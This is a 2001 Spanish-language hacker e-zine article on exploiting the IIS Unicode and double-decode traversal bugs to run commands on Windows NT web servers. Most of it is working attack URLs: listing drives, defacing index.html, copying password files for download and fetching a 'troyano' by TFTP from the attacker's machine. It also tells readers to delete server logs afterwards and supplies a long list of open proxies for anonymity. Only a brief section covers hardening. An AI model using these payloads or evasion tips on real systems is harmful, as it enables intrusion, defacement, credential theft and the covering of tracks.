Copy Link
Add to Bookmark
Report
3x02: Mi Amigo el Unicode/Decode
-[ 3x02.txt ]----------------------------------------------------------------
-[ Mi Amigo el Unicode/Decode ]-------------------------[ Mr. kl0nk Manson ]-
-------------------------------------------------------[ kl0nk@uole.com.ve ]-
-> s·b abr 28 23:25:43 VET 2001 <-
Indice General:
---------------
1. Introduccion.
2. Que es Unicode.
3. Herramientas.
a.- URL Scanner.
b.- Uniconsole.
c.- IISuni.
4. Listado de Comandos.
a.- Crear Directorio.
b.- Crear Archivo.
c.- Borrar Archivo.
d.- Copiando Archivos.
e.- Subiendo Archivos.
5. Variaciones de esta Vulnerabilidad.
6. Protegiendo nuestro servidor.
7. Lo nuevo ... Decode
a.- Variaciones del Decode
8. Regalo para los Lectores.
9. Links Relacionados.
10. Conclusiones y Agradecimientos.
1. Introduccion:
-------------
Este texto lo escribi con la finalidad de dar a conocer lo referente al
bug que sufren muchos servidores que trabajan bajo Windows NT. No me hago
responsable de lo que TU hagas o dejes de hacer con este paper.
2. Que es Unicode
--------------
El Unicode (en el caso de Windows NT), es un bug que afecta al IIS
(Internet Information Server), y con este bug podemos ejecutar cualquier
comando del DOS (cmd.exe) via Web. El Bug consiste en que nosostros
introduciendo una serie de comandos en el URL de la victima podamos
visualizar su estructura de directorios, podemos crear archivos, borrar,
subir archivos al servidor, etc.
Esto recibe este nombre, ya que esta serie de comandos traducen los
caracteres especiales de acuerdo a la configuracion internacional
conocida como Unicode.
Por ejemplo, si llegamos a encontar X servidor vulnerable a este bug
podemos introducir:
http://www.victima.com/datos/..%c1%9c../passwd.pwd
Este sera evaluado por el IIS y este creera que el atacante esta
solicitando un archivo del directorio virtual "/datos", intentando
encontrar dentro de este un subdirectorio llamado ..%c1%9c.. y dentro de
el, el archivo passwd.pwd.
El IIS interpretaria que el pedido de
http://www.victima.com/datos/..%c1%9c../passwd.pwd es local y buscaria
en c:/inetpub/wwwroot/datos/../../passwd.pwd
Tambien podemos pasarle argumentos al este bug para que nos ejecute el
command.com (en NT es cmd.exe), tambien podemos indicarle en que disco
duro debe buscarlo y que queremos ver. Por ejemplo:
http://www.victima.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
Donde /winnt/system32/cmd.exe es la ubicacion donde esta el cmd.exe,
con el parametro ?/c+dir+c le estamos indicando que ejecute el comando
dirdentro del cmd.exe y que visualice el disco duro que esta e n la
unidad "c", y como respuesta obtenemos el listado de el disco c:
3. Listado de Comandos
-------------------
NOTA: Esto pueder variar (por ejemplo en vez de c+dir+c: puede ser
c+dir+d: , c+dir+e: , etc). Tambien la ruta de los scripts
vulnerables (Ver la lista de Variaciones).
a.- Crear Directorio:
-----------------
http://www.victima.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/
c+md+c:\
ERES_LAMER
b.- Crear Archivo
-------------
http://www.victima.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/
c+echo+Este_Servidor_Sufre_El_Bug_de_UniCode+>c:\
inetpub\wwwroot\index.html
c.- Borrar Archivo
--------------
http://www.victima.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/
c+del+c:\
inetpub\wwwroot\index.html
d.- Copiando Archivos
-----------------
http://www.victima.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy
c:\winnt\passwords.pwd
+c:\inetpub\wwwroot
Luego nos los bajamos de http://www.victima.com/passwords.pwd
e.- Subiendo Archivos:
-----------------
Para ello necesitaremos un proxy y el TFTP (Trivial FTP), luego de
haberlo instalado en nuestra maquina simplemente colocamos:
tftp.exe -i 192.168.0.1 GET super-h4xor-troyano.exe
Donde 192.168.0.1 es nuestra IP.
NOTA: Cuando subimos un archivo queda un registro de lo que hemos hecho,
por lo tanto debemos borrar el archivo de historial que normalmente
se encuentra en c:/winnt/system32/logfiles/ (los archivos de
historial tienen extenciones .log).
4. Variaciones de esta Vulnerabilidad
----------------------------------
Puede ser que los ejemplos anteriores no les funciones porque este bug
se encuentra en otra parte del servidor, para ello les dejo una lista
de varios directorios donde se pueden encontar este bug.
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/
cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/
cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/
cmd.exe?/c+dir+c:\
5. Herramientas
------------
Entre las Herramientas mas poderosas para detectar servidores vulnerables
podemos encontar:
a.- URL Scanner:
------------
Es una utilidad escrita por la gente de SSH Team y esta es capaz de
encontrar servidores vulnerables al bug del Unicode dando un amplio rango
de IP's a escanear. Plataforma: Windows 9x
b.- Uniconsole
----------
Esta es una herramienta (tambien escrita por la gente de SSH) que permite
explotar el bug casi como si se tratase de una linea de comandos de DOS,
pero con una gran ventaja, que nos podemos conectar a un servidor proxy
y asi quedar anonimo. Plataforma: Windows 9x
c.- IISuni
------
Esta fue escrita por zipo y es una que corre bajo cualquier Unix, a este
exploit le podemos definir un servidor Proxy para ocultar nuestra
identidad.
NOTA: Estas Herramientas estan incluidas al final de este paper (UUEncode)
6. Protegiendo nuestro servidor
----------------------------
Estos son los pasos a seguir para protegerse de este bug.
a.- Eliminar todos los directorios virtuales (scripts, msadc, iisadmpwd,
etc).
b.- Quitar a todos los directorios que lo tengan el permiso de
ejecucion de CGI's e ISAPI, dejando solo el permiso de
ejecucion de scripts.
c.- Quitar todo permiso de escritura al usuario dentro de wwwroot, y
todo permiso (lectura y escritura) fuera de ese arbol de
directorios.
d.- Instalar Windows NT y los directorios compartidos en lugares
diferentes de los que vienen por defecto.
e.- Cambiar el nombre al archivo cmd.exe
f.- Utilizar cualquier derivado de Unix (Linux, FreeBSD, OpenBSD, Etc) y
como servidor web tener Apache Instalado (RECOMENDADO).
7. Lo Nuevo ... Decode
-------------------
Hace tiempo la Gente de NSFOCUS anuncio un nuevo fallo con riesgo mayor
al del Unicode, la cual afecta a Servidores Bajo NT/2000 que tengan
corriendo como servidor Web el IIS 4/5, en el cual, cualquier persona
introduciiendo unos comandos en el URL puede tener acceso remoto.
Este bug funciona de la siguiente forma:
http://www.victima.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
a.- Variaciones del Decode
----------------------
Aqui les dejo la Variaciones que tiene el Decode:
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+d
ir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c
+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+d
ir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c
+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+di
r+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+di
r+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd
.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/sy
stem32/cmd.exe?/c+dir+c:\
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+di
r+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+di
r+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd
.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/sy
stem32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c
+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c
+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?
/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/
c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?
/c+dir+c:\
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
8. Regalo para los Lectores
------------------------
Aqui les dejo una lista de Servidores Proxy Anonimos que puedes utilizar
en el momento de hacer cualquier cosita de estas. Esta lista es incluida
aqui gracias a mi Amigo MindLock. Por Favor no abusar de ellos ya que
pueden ser clausurados por abuso.
cache01.vsat.net:3128
ts.vsat.net:8080
cache02.vsat.net:8080
netcache.megalink.net:3128
eunice.clifton.ca:80
N2H2.sisna.com:80
195.240.133.121:80
ch3smc.bellglobal.com:80
63.76.58.130:8080
ce1.paonline.com:3128
proxy1.hedge.org:8080
159-18.ri.cgocable.ca:80
194.80.225.5:80
elpxy01.ce.mediaone.net:8080
195.219.50.243:80
mailgate.btmldn.com:80
ch3blm.bellglobal.com:80
webmail.artsfb.org.uk:80
32.97.206.130:80
elpxy02.ce.mediaone.net:8080
cache02.vsat.net:80
mail.callsunshine.com:80
SPPN_SVR.sppn.com:80
vml-ntserver1.vml.lib.mi.us:80
local252.12-17-14.itech.net:80
211.61.250.248:80
masterman.stc.ac.uk:80
194.25.113.243:80
kvisl.strengur.is:80
smtp.mcneiltech.com:80
195.61.76.63:80
195.231.101.139:80
icaro.cool.co.cr:80
211.61.251.248:80
195.70.174.22:80
195.215.149.51:80
194.182.173.76:3128
203.160.224.66:80
195.122.135.117:80
mail.nhisb.gov.tw:8080
www.msund.is:80
stefan.is.uw.edu.pl:80
195.224.112.35:80
193.15.238.100:80
www-cache.piramk.fi:80
195.127.175.50:80
195.229.214.67:80
dns.kitacom.co.jp:80
www.badpublicity.be:80
195.215.134.226:80
195.238.207.1:80
195.251.20.32:80
wel-cache.cache.telstra.net:3128
195.103.124.8:80
exchng.hatzi.gr:80
www.chania-cci.gr:81
206.47.230.2:80
12.18.19.122:8080
mail.paxarfal.com.hk:80
ns.uti.co.jp:80
www.ari.gov.cy:80
netcache.hawknet.com.au:80
mail.contcar.com:80
server.intern.xtend-online.de:80
195.250.212.79:80
195.142.141.200:80
194.27.40.20:80
200.14.244.194:80
netcache6.entelchile.net:80
netcache5.entelchile.net:80
NAS-213-186-128-252.ixir.com:80
ncache02.terra.cl:80
ncache04.terra.cl:80
ncache01.terra.cl:80
200.14.241.174:80
cache.net-uno.net:80
netcache4.entelchile.net:80
sai.isec.pt:80
netcache1.entelchile.net:80
194.27.53.4:80
cache.net-uno.net:8080
coryj.ozemail.com.au:8080
cpe.atm0-0-0-114159.boanxx1.customer.tele.dk:80
netc.hessen.de:3128
south.ocs.k12.al.us:80
ns01.huembmow.macomnet.ru:80
195.101.182.50:80
cdb-gw.sibnet.ru:80
proxy.informator.se:80
195.116.188.254:80
bnet1.bangorsd.org:80
151.198.195.102:80
mail.hacaro.be:80
bhtinc.lnk.telstra.net:8080
9. Links Relacionados
------------------
HispaSec | http://www.hispasec.com/unaaldia.asp?id=726
SecurityFocus | http://www.securityfocus.com
SSH Team | http://sshteam.8k.com
Microsoft | http://www.microsoft.com
Home Page Zipo | http://www.sucks.com.ar
MultiProxys | http://www.multiproxy.org
NSFocus | http://www.nsfocus.com
10. Conclusiones y Agradecimientos
------------------------------
Bueno, hemos llgado al final de este articulo, si tienen alguna duda,
pergunta, etc. Pueden Hacerla a kl0nk@uole.com.ve - Flames, Basura y
otros quimicos enviarlos a /dev/null
Quiero agradecer a Capone, MindLock, Maquiavelo y _CyRaNo_ por motivarme
a escribir este paper.
--EOF--
